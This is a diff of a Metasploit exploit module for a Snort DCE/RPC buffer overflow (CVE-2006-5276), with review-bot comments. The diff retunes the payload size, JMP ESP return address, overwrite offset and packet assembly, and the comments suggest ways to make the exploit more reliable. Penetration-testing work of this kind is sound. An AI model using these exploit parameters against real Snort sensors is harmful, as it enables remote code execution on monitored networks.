diff --git a/modules/exploits/windows/ids/snort_dce_rpc.rb b/modules/exploits/windows/ids/snort_dce_rpc.rb
index a9a3a09b94..3dbd40dde5 100644
--- a/modules/exploits/windows/ids/snort_dce_rpc.rb
+++ b/modules/exploits/windows/ids/snort_dce_rpc.rb
@@ -38,33 +38,37 @@ class Metasploit3 < Msf::Exploit::Remote
  [
  'Carsten Maartmann-Moe '
  ],
- 'License' => MSF_LICENSE,
- 'Version' => '$Revision$',
- 'Platform' => 'win',
- 'References' =>
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'Platform' => 'win',
+ 'References' =>
  [
  [ 'OSVDB', '67988' ],
  [ 'CVE', 'CVE-2006-5276' ],
  [ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']
  ],
- 'Privileged' => true,
- 'Payload' =>
+ 'DefaultOptions' =>
  {
- 'Space' => 500,
- 'BadChars' => "\x00",
- 'DisableNops' => true,
+ 'EXITFUNC' => 'thread',
  },
- 'Targets' =>
+ 'Payload' =>
+ {
+ 'Space' => 390,
+ 'BadChars' => "\x00",
+ 'DisableNops' => true,
+ },
+ 'Targets' =>
  [
  [ 'Windows Universal',
  {
- 'Ret' => 0x00407c01, # JMP ESP snort.exe
- 'Offset' => 0x0121 # The number of bytes before overwrite
+ 'Ret' => 0x00407c01, # JMP ESP snort.exe
+ 'Offset' => 289 # The number of bytes before overwrite
  }
  ],
  ],
- 'DisclosureDate' => 'Feb 19 2007',
- 'DefaultTarget' => 0))
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Feb 19 2007',
+ 'DefaultTarget' => 0))
 
  register_options(
  [
@@ -87,7 +91,6 @@ class Metasploit3 < Msf::Exploit::Remote
  capture_sendto(p, rhost)
- # Cleanup handler
  end
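Review bot: `'Space' => 390` cuts the payload budget from 500 without recording why, and nothing in the new target block ties 390 to the 289-byte `'Offset'` or to the request-size computation the exploit method does, so the next person retuning this module cannot tell which constraint the number satisfies; add a comment such as `'Space' => 390, # sized so sploit + Offset passes the Write AndX size check in exploit() -- confirm against the preprocessor limit`. `'Offset' => 289` is the same value as the old `0x0121`, so that line is a notation change only and its comment could say so rather than reading as a retune. Separately, the target is still called `'Windows Universal'` although its `'Ret' => 0x00407c01 # JMP ESP snort.exe` is a gadget inside one particular snort.exe build, which presumably does not hold across Snort versions; naming the build in the target string (or in the comment) would stop a wrong-version run from just crashing the sensor. The `initialize` call being edited starts before and ends after this hunk.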
@@ -145,14 +148,14 @@ class Metasploit3 < Msf::Exploit::Remote
  sploit = make_nops(10)
  sploit << payload.encoded
- # Padding (need to bad the payload with one byte to pass size check)
+ # Padding (to pass size check)
  sploit << make_nops(1)
- # The size to be included the Write AndX Request #2, including sploit payload
- size = [(sploit.size() + target['Offset'])].pack('v')
+ # The size to be included in Write AndX Request #2, including sploit payload
+ requestsize = [(sploit.size() + target['Offset'])].pack('v')
  # Assemble the parts into one package
- p.payload = header << size << tail << eip << sploit
+ p.payload = header << requestsize << tail << eip << sploit
  p.recalc
  p
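Review bot: The rewritten comment `# Padding (to pass size check)` drops the one fact the old comment carried, that exactly one extra byte is required, so the `sploit << make_nops(1)` below it now reads as arbitrary; keep the rationale, e.g. `# Pad with one byte so the Write AndX length passes the size check (exact check not shown here)`. On style, `requestsize` should be `request_size` per Ruby naming, and `sploit.size()` is better written `sploit.size` since Ruby omits parentheses on argument-less calls. Note also that `.pack('v')` silently truncates the length to 16 bits; with `'Space' => 390` from the first hunk plus the 289-byte offset and 11 bytes of nops the sum is 690, far below 65535, so a comment rather than a guard is enough. The enclosing exploit method starts before this hunk.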